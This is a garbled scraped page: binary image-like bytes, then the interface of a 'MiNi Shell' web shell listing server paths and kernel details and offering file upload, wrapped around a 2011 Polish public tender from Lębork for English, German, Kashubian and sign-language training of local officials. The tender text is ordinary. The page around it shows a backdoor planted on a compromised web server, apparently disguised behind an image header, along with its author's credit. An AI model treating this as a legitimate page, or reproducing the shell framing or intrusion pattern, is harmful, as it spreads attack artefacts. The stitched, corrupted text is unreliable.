JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110527/133248-N-2011.html

<p class="kh_header"><b>Lębork: Zorganizowanie i przeprowadzenie szkoleń z zakresu szkoleń językowych</b><br>
<b>Numer ogłoszenia: 133248 - 2011; data zamieszczenia: 27.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat.leborski.samorzady.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.powiat.leborski.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń z zakresu szkoleń językowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Głównym celem projektu jest wzmocnienie potencjału Starostwa Powiatowego w Lęborku, Urzędu Miejskiego w Lęborku, Urzędu Gminy w Nowej Wsi Lęborskiej, Urzędu Gminy w Cewicach oraz podniesienie jakości usług poprzez poprawę obsługi obywatela i podniesienie kwalifikacji zawodowych i osobistych 173 urzędniczek i urzędników w Powiecie Lęborskim w ramach projektu pn. Kadra przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenie, działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej).

1.	Przedmiot zamówienia 

Część I - Zorganizowanie i przeprowadzenie Szkolenia z zakresu obsługi klienta - język angielski - dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra przyszłości

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 8a do SIWZ.

Część II - Zorganizowanie i przeprowadzenie Szkolenie z zakresu obsługi klienta - język niemiecki - dla pracowników samorządowych z Powiatu Lęborskiego,  w ramach projektu pn. Kadra przyszłości

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 8b do SIWZ.
 
Część III - Zorganizowanie i przeprowadzenie Szkolenia z zakresu obsługi klienta - język kaszubski podstawowy - dla pracowników samorządowych z Powiatu Lęborskiego,  w ramach projektu pn. Kadra przyszłości

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 8c do SIWZ.

Część IV - Zorganizowanie i przeprowadzenie Szkolenia z zakresu obsługi klienta - język migowy - dla pracowników samorządowych z Powiatu Lęborskiego,  w ramach projektu pn. Kadra przyszłości

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 8d do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował zespołem złożonym z co najmniej 2 osób (1 osoba prowadząca plus jedna osoba w ewentualnym zastępstwie), które będą uczestniczyć w wykonywaniu zamówienia. Wszystkie osoby muszą spełnić poniższe wymaganie: 
- posiadają doświadczenie w przeprowadzeniu co najmniej 1 kursu szkolenia warsztatu dla osób dorosłych w grupie 10-12 osobowej, o tematyce zbliżonej do przedmiotu zamówienia, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
- dodatkowo w przypadku szkoleń z języka angielskiego i niemieckiego Zamawiający wymaga, aby osoby prowadzące posiadały ukończony college lub filologię odpowiednio angielską niemiecką oraz przygotowanie metodyczne lub kurs pedagogiczny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedstawia dokumenty jak wyżej, wypełnione w języku polskim bądź z tłumaczeniem na język polski potwierdzone za zgodność z oryginałem przez wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	przesunięcia terminu wykonania przedmiotu zamówienia,
b)	zmiany miejsca odbywania szkoleń kursów warsztatów
c)	zmiany osób wskazanych do przeprowadzenia szkoleń kursów warsztatów
d)	zmiany harmonogramu zajęć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Starostwa Powiatowego w Lęborku, ul. Czołgistów 5, 84-300 Lębork pok. nr 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 14:00, miejsce: Biuro Obsługi Interesanta Starostwa Powiatowego w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Kadra Przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenie, działanie 5.2 Wzmocnienie potencjału administracji samorządowej, poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie z zakresu obsługi klienta - język angielski - dla pracowników samorządowych z Powiatu Lęborskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia powinien obejmować m.in.:
Ankiety wstępne badające poziom znajomości języka u uczestników.
1.	Rozwijanie sprawności rozumienia języka ze słuchu poprzez m.in. słuchanie nagrań tekstów podręcznikowych, radiowych i telewizyjnych.
2.	Ćwiczenia sprawdzające prawidłowe zrozumienie i zapamiętywanie przekazywanych informacji. 
3.	Rozwijanie sprawności mówienia w formie zajęć konwersacyjnych, przeprowadzonych 
w oparciu o wcześniej poznane materiały audiowizualne lub przeczytane teksty.
4.	Poszerzenie wiedzy  z zakresu gramatyki. 
5.	Specjalistyczne słownictwo biznesowe oraz z zakresu działania jednostek samorządu terytorialnego.
6.	Redagowanie oficjalnych pism urzędowych, e-maili, sporządzanie notatek w języku angielskim.

Liczba uczestników: 12 osób/1grupa

Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 120 godzin. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. 
Zajęcia będą realizowane w dni robocze dla administracji publicznej, średnio po dwa spotkania 
w tygodniu po 2 godziny, w godzinach popołudniowych tj. od godziny 16-tej.


Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło we wrześniu 2011 roku, zaś termin ostatecznego zakończenia przypadał najpóźniej na październik 2012 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie z zakresu obsługi klienta - język niemiecki - dla pracowników samorządowych z Powiatu Lęborskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia powinien obejmować m.in.:
Ankiety wstępne badające poziom znajomości języka u uczestników.
1.	Rozwijanie sprawności rozumienia języka ze słuchu, m.in. poprzez słuchanie nagrań tekstów podręcznikowych, radiowych i telewizyjnych.
2.	Ćwiczenia sprawdzające prawidłowe zrozumienie i zapamiętywanie przekazywanych informacji. 
3.	Rozwijanie sprawności mówienia  w formie zajęć konwersacyjnych, przeprowadzonych  
w oparciu o wcześniej poznane materiały audiowizualne lub przeczytane teksty.
4.	Poszerzenie wiedzy  z zakresu gramatyki. 
5.	Specjalistyczne słownictwo biznesowe oraz z zakresu działania jednostek samorządu  terytorialnego.
6.	Redagowanie oficjalnych pism urzędowych, e-maili, sporządzanie notatek w języku niemieckim.

Liczba uczestników: 8 osób 1 grupa

Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 120 godzin. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. 
Zajęcia będą realizowane w dni robocze dla administracji publicznej,  średnio dwa spotkania 
w tygodniu po 2 godziny, w godzinach popołudniowych, tj. od godziny 16-tej.

Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło we wrześniu 2011 roku, zaś termin ostatecznego zakończenia przypadał najpóźniej na wrzesień 2012 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenia z zakresu obsługi klienta - język kaszubski podstawowy - dla pracowników samorządowych z Powiatu Lęborskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program 48h szkolenia powinien obejmować m.in.:

1.	Gramatyka kaszubska. 
a)	fonetyka (system wokaliczny i konsonantyczny, jotacja, labializacja, alternacje samogłoskowe i spółgłoskowe, upodobnienia, przestawki, kontaminacje). 
b)	fleksja (podstawowe wzorce deklinacyjne i koniugacyjne). 
c)	słowotwórstwo (warianty słowotwórcze różnych wyrazów, sufiksy typowo kaszubski). 
d)	składnia (rodzaje kaszubskich wypowiedzeń, wskaźniki zespolenia, szyk wyrazów, kalki składniowe z języka niemieckiego i polskiego). 

2.	Nauka pisania. 
a)	poznanie kaszubskiego alfabetu. 
b)	odróżnienie graficznej formy wyrazu od jego brzmienia fonetycznego. 
c)	pisanie wg obowiązujących zasad pisowni kaszubskiej. 
d)	pisanie tekstów z pamięci, dyktanda. 
e)	redagowanie różnych pism, tekstów w zależności od potrzeb i umiejętności słuchaczy. 
f)	poprawianie własnych i obcych tekstów kaszubskich przy pomocy słowników. 
g)	ćwiczenia z zakresu rozumienia tekstu (czytanie).


Liczba uczestników: 8 osób 1 grupa

Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 48 godzin. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy.
Zajęcia będą realizowane w dni robocze dla administracji publicznej, średnio dwa spotkania 
w tygodniu po 2 godziny w godzinach popołudniowych tj. od godziny 16-tej.

Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło w październiku 2011 roku, zaś termin ostatecznego zakończenia przypadał najpóźniej na luty 2012 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenia z zakresu obsługi klienta - język migowy - dla pracowników samorządowych z Powiatu Lęborskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia powinien obejmować m.in.:
1.	Założenia  i zasady systemu językowo-migowego, łączącego w sobie równolegle dwie odmiany języka - mówioną i miganą.
2.	Zasady  stosowania znaków migowych.
3.	Praktyczna nauka języka migowego w postaci pełnego zestawu znaków daktylograficznych (ok. 100 znaków elementarnych) oraz  haseł ideograficznych, niezbędnych do nawiązania kontaktu  z osobą głuchoniemą w urzędzie. 
	Znaki daktylograficzne 
a)	prawidła przekazywania alfabetu palcowego. Ćwiczenia usprawniające palce i nadgarstki. 
b)	znaki liter i liczebników 
c)	znaki działań arytmetycznych, ułamków zwykłych i dziesiętnych,
d)	znak pojęciowy cały,
e)	znaki wyrazów jednoliterowych,
f)	znaki miar metrycznych, interpunkcyjne,
g)	zasady  przekazywania skrótów i dużych liter.
	Ideografia
a)	praktyczne funkcjonowanie systemu językowo-migowego ,
b)	nauka  przekazywania znaków pojęciowych w synchronizacji z mową i znakami daktylograficznymi 
4.	Przygotowanie słuchaczy do dalszego samokształcenia w zakresie języka

5. Liczba uczestników: 15 osób 1 grupa

6. Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 120 godzin. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy.
Zajęcia będą realizowane w dni robocze dla administracji publicznej, średnio dwa spotkania 
w tygodniu po 2 godziny w godzinach popołudniowych, tj. od godziny 16-tej.

7. Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło od stycznia 2012 roku, zaś termin ostatecznego zakończenia przypadał najpóźniej na listopad 2012 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com